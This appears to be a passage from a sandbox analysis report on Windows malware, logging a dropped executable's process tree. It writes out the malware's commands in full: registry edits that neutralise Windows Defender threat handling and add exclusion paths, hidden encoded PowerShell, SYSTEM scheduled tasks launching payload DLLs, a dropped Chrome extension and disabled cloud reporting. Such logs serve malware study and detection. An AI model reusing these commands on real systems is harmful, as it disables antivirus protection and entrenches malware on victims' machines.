C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe hl /Tnsite_idMfj 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2040
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3836
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3212
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:1552
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:4304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:4160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:4052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:5024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:3232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:3848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:4028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:2208
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqgFhoPUL" /SC once /ST 00:06:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqgFhoPUL"2⤵PID:2472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqgFhoPUL"2⤵PID:4700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 06:25:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe\" UK /bAsite_idbVJ 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZJggANjsYpCqsGjEe"2⤵PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:576
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:480
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4016
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe UK /bAsite_idbVJ 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"2⤵PID:3116
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4748
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2092
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4472
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\IjUmhi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eGwAoTnpAObQfPU"2⤵PID:4708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGwAoTnpAObQfPU"2⤵PID:4808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\SOeOsXe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 06:14:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll\",#1 /JQsite_idXyH 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kkPqOHrufYpxTagPJ"2⤵PID:2868
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1052
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1116
-
